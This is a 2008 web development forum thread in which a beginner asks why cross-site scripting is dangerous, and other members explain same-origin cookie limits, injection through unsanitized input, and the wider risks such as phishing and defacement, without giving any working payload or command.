I've read quite a few documents now and watched a video and I really don't understand how XSS is an issue. What I understand so far is that Javascript is ran on the clients browser to expose their cookies. But it also seems that a site hosting XSS can only reveal cookies for that particular domain, which the domains has access to anyway.
Am I confusing XSS in thinking that it's somehow possible to create a page that when a user visits it sends all of their cookies, including from other domains cookies, to another addresss.
EG:
Visit http://www.example.com/stealCookies.php
stealCookies.php fetches ALL cookies from the users browser
stealCookies.php sends those cookies to the attacker.
I don't understand the risk of XSS
Moderator: General Moderators
Re: I don't understand the risk of XSS
No, you can't steal cookies this way because you don't have access to cookies which do not belong to example.com domain. You need to inject a javascript code in the target domain, which when executed in the browser sends (usually by GET) the cookie content to a page in another domain (the attacker's domain).
Last edited by VladSun on Thu Jun 05, 2008 3:16 pm, edited 1 time in total.
There are 10 types of people in this world, those who understand binary and those who don't
-
impulse()
- Forum Regular
- Posts: 748
- Joined: Wed Aug 09, 2006 8:36 am
- Location: Staffordshire, UK
- Contact:
Re: I don't understand the risk of XSS
So there's 2 example domains:
example1.com
example2.org
example1.com is an attackers domain and example2.org is the domain an attackers wants to steal a users cookies for. Would an attacker need to gain access to example2.org and host a file on there before XSS would work?
example1.com
example2.org
example1.com is an attackers domain and example2.org is the domain an attackers wants to steal a users cookies for. Would an attacker need to gain access to example2.org and host a file on there before XSS would work?
Re: I don't understand the risk of XSS
Usually the XSS code is injected by not sanitized inputs/outputs in example2.org.
There are 10 types of people in this world, those who understand binary and those who don't
-
impulse()
- Forum Regular
- Posts: 748
- Joined: Wed Aug 09, 2006 8:36 am
- Location: Staffordshire, UK
- Contact:
Re: I don't understand the risk of XSS
That makes a lot more sense. Before you said that it seemed to me that the attacker had to gain unauthorized access to example2.org and host a rogue file on there.
Thanks,
Thanks,
Re: I don't understand the risk of XSS
XSS >> (even >>>>!) cookie stealing
(Hint: ">>" is the math notation for "much much greater")
It is generally an attack on the client. It exploits the trust the client has in the server. Leaking cookies to a 3rd party is only one of the possible concerns. XSS can lead to / be used for defacing, phishing, for a leverage to help CSRF, for a covert communication channel, for (D)DOS, etc. Persistent XSS in a multi-user site means lots of browsers under the control of the attacker, an instant botnet if you will.
It is a serious vulnerability, easy to make, easy to be discovered by the attacker, and potentially damaging to many parties.
(Hint: ">>" is the math notation for "much much greater")
It is generally an attack on the client. It exploits the trust the client has in the server. Leaking cookies to a 3rd party is only one of the possible concerns. XSS can lead to / be used for defacing, phishing, for a leverage to help CSRF, for a covert communication channel, for (D)DOS, etc. Persistent XSS in a multi-user site means lots of browsers under the control of the attacker, an instant botnet if you will.
It is a serious vulnerability, easy to make, easy to be discovered by the attacker, and potentially damaging to many parties.
-
impulse()
- Forum Regular
- Posts: 748
- Joined: Wed Aug 09, 2006 8:36 am
- Location: Staffordshire, UK
- Contact:
Re: I don't understand the risk of XSS
So any website that uses cookies and doesn't validate user input is at risk?
Re: I don't understand the risk of XSS
Any website that doesn't validate/filter/sanitize user input is at riskimpulse() wrote:So any website that uses cookies and doesn't validate user input is at risk?
There are 10 types of people in this world, those who understand binary and those who don't